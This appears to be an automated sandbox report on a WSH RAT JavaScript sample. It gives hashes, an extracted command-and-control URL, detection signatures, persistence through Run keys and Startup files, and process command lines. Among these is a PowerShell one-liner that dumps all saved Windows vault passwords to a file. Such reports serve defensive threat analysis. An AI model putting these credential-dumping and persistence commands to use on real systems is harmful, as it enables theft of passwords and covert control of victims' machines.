Analysis
- max time kernel: 71s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 01-11-2022 08:16
Static task: static1
Behavioral task: behavioral1
  Sample: FCR22001306.js
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: FCR22001306.js
  Resource: win10v2004-20220812-en
General
- Target: FCR22001306.js
- Size: 268KB
- MD5: d873c25379f94f8a1803f4c968befaf6
- SHA1: 13293c020e2eec88e5627a44ec8eafa3b0d0f6ab
- SHA256: da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4
- SHA512: d3ee46a7e61496230bb65082b5c07c4641c965ed523471d548bd1694e7df0f8d6c5c851f99dba5a981454224cdeac4ba0f1ed30266d8235d11e111db983be062
- SSDEEP: 3072:xGFYHhbq8fCQFiem5yBmExNr2sBB1fbNQnTXFEZhRZfUQ0jShn8nc2KVHybnuRAL:sF8fCQHWsBBJpYEPfM3jY2+4CAU9i
Malware Config
- Extracted: wshrat
- URL: http://egodds.longmusic.com:2084
Signatures
- NirSoft MailPassView (2 IoCs)
  Password recovery tool for various email clients
    resource                                      yara_rule
    behavioral2/files/0x000600000002334f-146.dat  MailPassView
    behavioral2/files/0x000600000002334f-147.dat  MailPassView
- Nirsoft (2 IoCs)
    resource                                      yara_rule
    behavioral2/files/0x000600000002334f-146.dat  Nirsoft
    behavioral2/files/0x000600000002334f-147.dat  Nirsoft
- Blocklisted process makes network request (9 IoCs)
    flow  pid   Process
    8     1128  wscript.exe
    9     4380  wscript.exe
    11    1128  wscript.exe
    19    1128  wscript.exe
    20    1128  wscript.exe
    24    1128  wscript.exe
    27    1128  wscript.exe
    29    4380  wscript.exe
    41    4380  wscript.exe
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
    description        ioc                                                                                                   Process
    Key value queried  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation  wscript.exe
- Drops startup file (4 IoCs)
    description                   ioc                                                                                          Process
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js  wscript.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js  wscript.exe
    File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js   wscript.exe
    File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js   wscript.exe
- Adds Run key to start application (2 TTPs, 4 IoCs)
    description      ioc  Process
    Key created      \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\software\microsoft\windows\currentversion\run  wscript.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\""  wscript.exe
    Key created      \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run  wscript.exe
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\FCR22001306.js\""  wscript.exe
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
    flow  ioc
    6     ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with taskkill (2 IoCs)
    pid   Process
    4952  taskkill.exe
    1680  taskkill.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
    description             flow  ioc
    HTTP User-Agent header  20    WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands
    HTTP User-Agent header  24    WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands
    HTTP User-Agent header  11    WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands
    HTTP User-Agent header  19    WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands
- Suspicious use of WriteProcessMemory (2 IoCs)
    description                       pid   Process      procid_target
    PID 1128 wrote to memory of 4380  1128  wscript.exe  81
    PID 1128 wrote to memory of 4380  1128  wscript.exe  81
Processes
- C:\Windows\system32\wscript.exe (PID 1128)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js
  Signatures: Blocklisted process makes network request; Checks computer location settings; Drops startup file; Adds Run key to start application; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\wscript.exe (PID 4380)
    Command line: "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"
    Signatures: Blocklisted process makes network request; Drops startup file
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2336)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
  - C:\Windows\system32\cmd.exe (PID 3196)
    Command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
    - C:\Windows\system32\taskkill.exe (PID 4952)
      Command line: taskkill /F /IM cmdc.exe
      Signatures: Kills process with taskkill
  - C:\Windows\system32\cmd.exe (PID 732)
    Command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
  - C:\Users\Admin\AppData\Local\Temp\cmdc.exe (PID 4024)
    Command line: "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
  - C:\Windows\system32\cmd.exe (PID 3236)
    Command line: "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
- C:\Windows\system32\taskkill.exe (PID 1680)
  Command line: taskkill /F /IM cmdc.exe
  Signatures: Kills process with taskkill
MITRE ATT&CK Enterprise v6
Downloads